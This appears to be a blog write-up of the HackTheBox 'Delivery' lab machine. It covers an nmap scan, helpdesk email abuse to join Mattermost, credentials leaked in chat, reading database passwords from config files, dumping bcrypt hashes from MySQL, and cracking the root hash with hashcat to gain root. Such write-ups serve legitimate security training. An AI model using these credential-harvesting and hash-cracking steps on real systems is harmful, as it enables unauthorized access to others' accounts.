HackTheBox - Delivery write up
5 min read

HackTheBox - Delivery write up

HackTheBox - Delivery write up

Delivery is a easy Linux box.


As always, let's start with an nmap scan :

$ nmap -A -p- -oN scan.nmap
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 (RSA)
|   256 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 (ECDSA)
|_  256 b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c (ED25519)
80/tcp   open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Welcome
8065/tcp open  unknown
| fingerprint-strings: 
|   GenericLines, Help, RTSPRequest, SSLSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Accept-Ranges: bytes
|     Cache-Control: no-cache, max-age=31556926, public
|     Content-Length: 3108
|     Content-Security-Policy: frame-ancestors 'self'; script-src 'self' cdn.rudderlabs.com
|     Content-Type: text/html; charset=utf-8
|     Last-Modified: Sat, 09 Jan 2021 19:09:12 GMT
|     X-Frame-Options: SAMEORIGIN
|     X-Request-Id: 3uzeey8xwp8z8gdjw68z7cfk4y
|     X-Version-Id:
|     Date: Sat, 09 Jan 2021 20:53:40 GMT
|     <!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><meta name="robots" content="noindex, nofollow"><meta name="referrer" content="no-referrer"><title>Mattermost</title><meta name="mobile-web-app-capable" content="yes"><meta name="application-name" content="Mattermost"><meta name="format-detection" content="telephone=no"><link re
|   HTTPOptions: 
|     HTTP/1.0 405 Method Not Allowed
|     Date: Sat, 09 Jan 2021 20:53:40 GMT
|_    Content-Length: 0

Three ports are open, 22 for SSH, 80 for a Nginx web server and 8065 for Mattermost. Mattermost is an open-source, self-hostable online chat service.
First of all, let's check the port 80.


Our goal is to create an account on the MatterMost, but to create an account we need a valid email address. This machine doesn't send email outside of the box, so we can't use a gmail address for example.

The HelpDesk app is on the port 80 with a different VHOST.

$ cat /etc/hosts
... helpdesk.delivery.htb delivery.htb

osTicket is a open source support ticket system.

First, I try to find some CVE on osTicket but the version was not displayed on the website. So, I look at the Javascript and CSS source code and compare it to the source code available on the github of osTicket.


The last change I see was about an update from 2 months ago, version 1.15.1. This version does not appear to be vulnerable. :(

So, I create an account on the HelpDesk.

We can see that osTicket create an email for this ticket, 9244799@delivery.htb. Let's create an account on MatterMost with this email address.

We can see the confirmation email if we check the Ticket Thread.

Once logged on the MatterMost, we can see a staff conversation.

We have the server credentials, maildeliverer:Youve_G0t_Mail! and we know that the staff uses variations of the password, PleaseSubscribe!

With the maildeliverer crendentials we can become admin of osTicket but it's not interesting. However, this credentials give us a ssh access to the box.

$ ssh maildeliverer@
maildeliverer@'s password: Youve_G0t_Mail!
Linux Delivery 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64
Last login: Tue Jan  5 06:09:50 2021 from
maildeliverer@Delivery:~$ id
uid=1000(maildeliverer) gid=1000(maildeliverer) groups=1000(maildeliverer)
maildeliverer@Delivery:~$ ls
maildeliverer@Delivery:~$ cat user.txt 

Finally, we have our first shell and the user flag !


I found mysql credentials for osTicket in a PHP config file.

maildeliverer@Delivery:/var/www/osticket/upload/include$ cat ost-config.php 
maildeliverer@Delivery:/var/www/osticket/upload/include$ mysql -u ost_user -p
Enter password: !H3lpD3sk123!
Welcome to the MariaDB monitor.
MariaDB [(none)]> use osticket;
MariaDB [osticket]> SELECT username,passwd,isadmin FROM ost_staff;
| username      | passwd                                                       | isadmin |
| maildeliverer | $2a$08$VlccTgoFaxEaGJnZtWwJBOf2EqMW5L1ZLA72QoQN/TrrOJt9mFGcy |       1 |
1 row in set (0.000 sec)

This credentials are maildeliverer:Youve_G0t_Mail!, so nothing interesting here.

Afterwards, I found another mysql credentials for MatterMost in a config.json file.

maildeliverer@Delivery:/opt/mattermost/config$ cat config.json 
    "SqlSettings": {
        "DriverName": "mysql",
        "DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(,utf8\u0026readTimeout=30s\u0026writeTimeout=30s",
        "DataSourceReplicas": [],
        "DataSourceSearchReplicas": [],
        "MaxIdleConns": 20,
        "ConnMaxLifetimeMilliseconds": 3600000,
        "MaxOpenConns": 300,
        "Trace": false,
        "AtRestEncryptKey": "n5uax3d4f919obtsp1pw1k5xetq1enez",
        "QueryTimeout": 30,
        "DisableDatabaseSearch": false
maildeliverer@Delivery:/opt/mattermost/config$ mysql -u mmuser -p
Enter password: Crack_The_MM_Admin_PW
Welcome to the MariaDB monitor.
MariaDB [(none)]> use mattermost;
Database changed
MariaDB [mattermost]> select username,password from Users;
| username                         | password                                                     |
| ...                              |                                                              |
| root                             | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO |
| ...                              |                                                              |
9 rows in set (0.001 sec)

I assume that this hash is a variant of PleaseSubscribe!, let's use hashcat to crack it. I don't have this tool on my machine, so I install it on Google Collab, you can find the tutorial here.

$ echo '$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO' > root.hash
$ echo 'PleaseSubscribe!' > wordlists/pleasesub.dict

$ hashcat -h
  Attack-          | Hash- |
  Mode             | Type  | Example command
  Wordlist + Rules | MD5   | hashcat -a 0 -m 0 example0.hash example.dict -r rules/best64.rule

$ hashcat -h | grep bcrypt
  3200 | bcrypt $2*$, Blowfish (Unix)                     | Operating System

$ hashcat -a 0 -m 3200 root.hash wordlists/pleasesub.dict -r hashcat/rules/best64.rule

We get the password, PleaseSubscribe!21 !

maildeliverer@Delivery:~$ su root
Password: PleaseSubscribe!21
root@Delivery:/home/maildeliverer# cd
root@Delivery:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Delivery:~# cat root.txt 

I hope you enjoyed this write up !

Enjoying these posts? Subscribe for more